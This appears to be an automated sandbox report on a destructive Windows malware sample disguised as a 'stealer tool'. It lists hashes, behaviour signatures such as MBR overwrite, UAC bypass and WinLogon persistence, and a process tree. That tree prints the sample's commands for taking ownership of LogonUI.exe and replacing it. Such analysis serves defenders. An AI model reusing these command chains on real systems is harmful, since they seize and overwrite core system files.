Analysis

  • max time kernel
    222s
  • max time network
    218s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-08-2024 17:31

Errors

Reason
Machine shutdown

General

  • Target

    stealer tool + secret options/ADM Adrenaline Ultimate Edition.exe

  • Size

    15.0MB

  • MD5

    8f5a2b3154aba26acf5440fd3034326c

  • SHA1

    b4d508ee783dc1f1a2cf9147cc1e5729470e773b

  • SHA256

    fc7e799742a1c64361a8a9c3fecdf44f9db85f0bf57f4fb5712519d12ba4c5ac

  • SHA512

    01c052c71a2f97daf76c91765e3ee6ec46ca7cb67b162c2fc668ef5ee35399622496c95568dedffbaf72524f70f6afcfe90f567fbb653a93d800664b046cd5f2

  • SSDEEP

    393216:l2iLiU7VXd6AKprP7iJx4J20cQ3qpalJZfhxGWqIcckC:l2iNObp4x820AS7nj

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Disables Task Manager via registry modification
  • Possible privilege escalation attempt 4 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Control Panel 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\stealer tool + secret options\ADM Adrenaline Ultimate Edition.exe
    "C:\Users\Admin\AppData\Local\Temp\stealer tool + secret options\ADM Adrenaline Ultimate Edition.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4840
    • C:\Windows\system32\wscript.exe
      "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\4E79.tmp\4E7A.tmp\4E7B.vbs //Nologo
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3140
      • C:\Users\Admin\AppData\Local\Temp\4E79.tmp\mbr.exe
        "C:\Users\Admin\AppData\Local\Temp\4E79.tmp\mbr.exe"
        3⤵
        • Executes dropped EXE
        • Writes to the Master Boot Record (MBR)
        • System Location Discovery: System Language Discovery
        PID:3092
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4E79.tmp\tools.cmd" "
        3⤵
        • Drops file in Windows directory
        • Suspicious use of WriteProcessMemory
        PID:4316
        • C:\Windows\system32\reg.exe
          reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
          4⤵
          • Sets desktop wallpaper using registry
          PID:4772
        • C:\Windows\system32\rundll32.exe
          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
          4⤵
            PID:2620
          • C:\Windows\system32\rundll32.exe
            RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
            4⤵
              PID:3964
            • C:\Windows\system32\rundll32.exe
              RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
              4⤵
                PID:2708
              • C:\Windows\system32\rundll32.exe
                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                4⤵
                  PID:2376
                • C:\Windows\system32\rundll32.exe
                  RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                  4⤵
                    PID:3688
                  • C:\Windows\system32\rundll32.exe
                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                    4⤵
                      PID:3536
                    • C:\Windows\system32\rundll32.exe
                      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                      4⤵
                        PID:2420
                      • C:\Windows\system32\rundll32.exe
                        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                        4⤵
                          PID:2192
                        • C:\Windows\system32\rundll32.exe
                          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                          4⤵
                            PID:3076
                          • C:\Windows\system32\rundll32.exe
                            RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                            4⤵
                              PID:4160
                            • C:\Windows\system32\rundll32.exe
                              RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                              4⤵
                                PID:1628
                              • C:\Windows\system32\rundll32.exe
                                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                4⤵
                                  PID:2108
                                • C:\Windows\system32\rundll32.exe
                                  RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                  4⤵
                                    PID:696
                                  • C:\Windows\system32\rundll32.exe
                                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                    4⤵
                                      PID:392
                                    • C:\Windows\system32\rundll32.exe
                                      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                      4⤵
                                        PID:856
                                      • C:\Windows\system32\rundll32.exe
                                        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                        4⤵
                                          PID:3372
                                        • C:\Windows\system32\rundll32.exe
                                          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                          4⤵
                                            PID:2880
                                          • C:\Windows\system32\rundll32.exe
                                            RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                            4⤵
                                              PID:2004
                                            • C:\Windows\system32\rundll32.exe
                                              RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                              4⤵
                                                PID:2280
                                              • C:\Windows\system32\rundll32.exe
                                                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                4⤵
                                                  PID:4516
                                                • C:\Windows\system32\rundll32.exe
                                                  RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                  4⤵
                                                    PID:3312
                                                  • C:\Windows\system32\rundll32.exe
                                                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                    4⤵
                                                      PID:32
                                                    • C:\Windows\system32\rundll32.exe
                                                      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                      4⤵
                                                        PID:3208
                                                      • C:\Windows\system32\rundll32.exe
                                                        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                        4⤵
                                                          PID:3496
                                                        • C:\Windows\system32\rundll32.exe
                                                          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                          4⤵
                                                            PID:3396
                                                          • C:\Windows\system32\rundll32.exe
                                                            RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                            4⤵
                                                              PID:3832
                                                            • C:\Windows\system32\rundll32.exe
                                                              RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                              4⤵
                                                                PID:4480
                                                              • C:\Windows\system32\rundll32.exe
                                                                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                4⤵
                                                                  PID:4440
                                                                • C:\Windows\system32\rundll32.exe
                                                                  RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                  4⤵
                                                                    PID:4560
                                                                  • C:\Windows\system32\rundll32.exe
                                                                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                    4⤵
                                                                      PID:2964
                                                                    • C:\Windows\system32\rundll32.exe
                                                                      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                      4⤵
                                                                        PID:2100
                                                                      • C:\Windows\system32\rundll32.exe
                                                                        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                        4⤵
                                                                          PID:1576
                                                                        • C:\Windows\system32\rundll32.exe
                                                                          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                          4⤵
                                                                            PID:4824
                                                                          • C:\Windows\system32\rundll32.exe
                                                                            RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                            4⤵
                                                                              PID:1356
                                                                            • C:\Windows\system32\rundll32.exe
                                                                              RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                              4⤵
                                                                                PID:2788
                                                                            • C:\Users\Admin\AppData\Local\Temp\4E79.tmp\jeffpopup.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\4E79.tmp\jeffpopup.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:3796
                                                                            • C:\Users\Admin\AppData\Local\Temp\4E79.tmp\bobcreep.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\4E79.tmp\bobcreep.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:1304
                                                                            • C:\Users\Admin\AppData\Local\Temp\4E79.tmp\gdifuncs.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\4E79.tmp\gdifuncs.exe"
                                                                              3⤵
                                                                              • Modifies WinLogon for persistence
                                                                              • UAC bypass
                                                                              • Checks computer location settings
                                                                              • Executes dropped EXE
                                                                              • Drops file in Windows directory
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Modifies Control Panel
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • System policy modification
                                                                              PID:4188
                                                                              • C:\windows\SysWOW64\takeown.exe
                                                                                "C:\windows\system32\takeown.exe" /f C:\windows\system32\LogonUI.exe
                                                                                4⤵
                                                                                • Possible privilege escalation attempt
                                                                                • Modifies file permissions
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:2688
                                                                              • C:\windows\SysWOW64\icacls.exe
                                                                                "C:\windows\system32\icacls.exe" C:\\windows\\system32\\LogonUI.exe /granted "Admin":F
                                                                                4⤵
                                                                                • Possible privilege escalation attempt
                                                                                • Modifies file permissions
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:2772
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c cd\&cd Windows\system32&takeown /f LogonUI.exe&icacls LogonUI.exe /granted "%username%":F&cd..&cd winbase_base_procid_none&cd secureloc0x65&copy "ui65.exe" "C:\windows\system32\LogonUI.exe" /Y&echo WinLTDRStartwinpos > "c:\windows\WinAttr.gci"&timeout 2&taskkill /f /im "tobi0a0c.exe"&exit
                                                                                4⤵
                                                                                • Drops file in Windows directory
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:3600
                                                                                • C:\Windows\SysWOW64\takeown.exe
                                                                                  takeown /f LogonUI.exe
                                                                                  5⤵
                                                                                  • Possible privilege escalation attempt
                                                                                  • Modifies file permissions
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:4344
                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                  icacls LogonUI.exe /granted "Admin":F
                                                                                  5⤵
                                                                                  • Possible privilege escalation attempt
                                                                                  • Modifies file permissions
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:4588
                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                  timeout 2
                                                                                  5⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Delays execution with timeout.exe
                                                                                  PID:3984
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /f /im "tobi0a0c.exe"
                                                                                  5⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Kills process with taskkill
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2084
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3836,i,11391966286255097843,10588851088187498028,262144 --variations-seed-version --mojo-platform-channel-handle=4352 /prefetch:8
                                                                          1⤵
                                                                            PID:4584
                                                                          • C:\Windows\system32\AUDIODG.EXE
                                                                            C:\Windows\system32\AUDIODG.EXE 0x4e8 0x4f4
                                                                            1⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:4320

                                                                          Network

                                                                          MITRE ATT&CK Enterprise v15

                                                                          Replay Monitor

                                                                          Loading Replay Monitor...

                                                                          Downloads

                                                                          • C:\Users\Admin\AppData\Local\Temp\4E79.tmp\4E7A.tmp\4E7B.vbs

                                                                            Filesize

                                                                            2KB

                                                                            MD5

                                                                            a0679dce64fcf875f4208b823d4b85c0

                                                                            SHA1

                                                                            85abe3673db82bfe5b2c207dc98648e32afffea0

                                                                            SHA256

                                                                            85a07013575a6a890c7b1d26adaa52f17616c4cca673617aa1fc0992aa29dda1

                                                                            SHA512

                                                                            1e2740a09acc5b0d679acfd740feb3556638f1b6029078668bbb7e067b356fcecf23c5b317b02888822cc180c0eb5cb7e2caf63d92a74515ebc5a1031d80f3a6

                                                                          • C:\Users\Admin\AppData\Local\Temp\4E79.tmp\bg.bmp

                                                                            Filesize

                                                                            6.6MB

                                                                            MD5

                                                                            a605dbeda4f89c1569dd46221c5e85b5

                                                                            SHA1

                                                                            5f28ce1e1788a083552b9ac760e57d278467a1f9

                                                                            SHA256

                                                                            77897f44096311ddb6d569c2a595eca3967c645f24c274318a51e5346816eb8e

                                                                            SHA512

                                                                            e4afa652f0133d51480f1d249c828600d02f024aa2cccfb58a0830a9d0c6ee56906736e6d87554ed25c4e69252536cb7379b60b2867b647966269c965b538610

                                                                          • C:\Users\Admin\AppData\Local\Temp\4E79.tmp\bobcreep.exe

                                                                            Filesize

                                                                            92KB

                                                                            MD5

                                                                            219cd85d93a4ed65a481f353a3de5376

                                                                            SHA1

                                                                            a38ab77caf5417765d5595b2fcd859c6354bf079

                                                                            SHA256

                                                                            00c9fdc8b877c7fb8365709155ab28cb3dac282ae7ec9fc9d47a78b408e0d13f

                                                                            SHA512

                                                                            367644e3bc3310207b5863b09688269c38a55540b8c87e71d66771c954d37d561ed09f3ee11b36c4c8f4a48b618b2e8debae3d93ff684d15305f93a3ade6b3d9

                                                                          • C:\Users\Admin\AppData\Local\Temp\4E79.tmp\gdifuncs.exe

                                                                            Filesize

                                                                            5.0MB

                                                                            MD5

                                                                            c47c6a5111193af2c9337634b773d2d3

                                                                            SHA1

                                                                            036604921b67bbad60c7823482e5e6cb268ded14

                                                                            SHA256

                                                                            7c4f20624dd062a6c71d845d05c6328d5a903ca96398e2902506591b231ed585

                                                                            SHA512

                                                                            56698b7b2edc0f94d0f7172c853cbe67ac682d132df768659ebca0c169091acb36ffd0a6874c26e2fb35117061c91c9eca4312532ba778312e3d63cc77ce1262

                                                                          • C:\Users\Admin\AppData\Local\Temp\4E79.tmp\jeffpopup.exe

                                                                            Filesize

                                                                            780KB

                                                                            MD5

                                                                            4151b988c9d5c550ccb6c3b49bf551d4

                                                                            SHA1

                                                                            10ff979be4a5bbacaf208bdbb8236b940208eed1

                                                                            SHA256

                                                                            5ec45cc1a109f556d0cd44ba48d3bf11af556ee66dd8b78c94d3ef0e93735e8e

                                                                            SHA512

                                                                            c73947b534741c29340550066cd1a6b7cbb4387f3be8303f2d1d0cb21c6f430e0415c27daabc82d32570f421934db78dc840403de18aef09d5a4f0cbe4350e4d

                                                                          • C:\Users\Admin\AppData\Local\Temp\4E79.tmp\mainbgtheme.wav

                                                                            Filesize

                                                                            19.0MB

                                                                            MD5

                                                                            1b185a156cfc1ddeff939bf62672516b

                                                                            SHA1

                                                                            fd8b803400036f42c8d20ae491e2f1f040a1aed5

                                                                            SHA256

                                                                            e147a3c7a333cbc90e1bf9c08955d191ce83f33542297121635c1d79ecfdfa36

                                                                            SHA512

                                                                            41b33930e3efe628dae39083ef616baaf6ceb46056a94ab21b4b67eec490b0442a4211eaab79fce1f75f40ecdc853d269c82b5c5389081102f11e0f2f6503ae7

                                                                          • C:\Users\Admin\AppData\Local\Temp\4E79.tmp\mbr.exe

                                                                            Filesize

                                                                            1.3MB

                                                                            MD5

                                                                            74be3afd732dc010c8266326cc32127b

                                                                            SHA1

                                                                            a91802c200f10c09ff9a0679c274bbe55ecb7b41

                                                                            SHA256

                                                                            03fe34795ad0f91fc8eb8c9ebe8094541e4fb4d7095095f8b48f345c2a6d0f0c

                                                                            SHA512

                                                                            68fa03d640680e37614feccb56f4d41180724cb7c08ba25f9bea3830a44c03d635664d8e0255ab2d05d3613498f4a4dd4398b7971a2cb1c9ae3be93f944946e5

                                                                          • C:\Users\Admin\AppData\Local\Temp\4E79.tmp\tools.cmd

                                                                            Filesize

                                                                            2KB

                                                                            MD5

                                                                            288bebe9f904e6fabe4de67bd7897445

                                                                            SHA1

                                                                            0587ce2d936600a9eb142c6197fe12a0c3e8472f

                                                                            SHA256

                                                                            cf965fcc5a7ca4d9245c706c88b4d5013fb84be27b0ec262facccfadf14bdca2

                                                                            SHA512

                                                                            7db8e7c1318bcab7cef2c02484a82f347a630443a644b546a5cc339a5a848d1a3e915255f9c357de6ee26817a55d1091d80e2a8e97f66afa5686b3d11ee56c3c

                                                                          • C:\Users\Admin\Desktop\YOUDIED 5.txt

                                                                            Filesize

                                                                            74B

                                                                            MD5

                                                                            05d30a59150a996af1258cdc6f388684

                                                                            SHA1

                                                                            c773b24888976c889284365dd0b584f003141f38

                                                                            SHA256

                                                                            c5e98b515636d1d7b2cd13326b70968b322469dbbe8c76fc7a84e236c1b579c9

                                                                            SHA512

                                                                            2144cd74536bc663d6031d7c718db64fd246346750304a8ceef5b58cd135d6ea061c43c9150334ee292c7367ff4991b118080152b8ebc9c5630b6c5186872a3a

                                                                          • memory/3092-220-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                            Filesize

                                                                            864KB

                                                                          • memory/4188-240-0x0000000000B60000-0x0000000001062000-memory.dmp

                                                                            Filesize

                                                                            5.0MB

                                                                          • memory/4188-241-0x0000000005F10000-0x00000000064B4000-memory.dmp

                                                                            Filesize

                                                                            5.6MB

                                                                          • memory/4188-242-0x0000000005A40000-0x0000000005AD2000-memory.dmp

                                                                            Filesize

                                                                            584KB

                                                                          • memory/4188-243-0x0000000005D10000-0x0000000005D1A000-memory.dmp

                                                                            Filesize

                                                                            40KB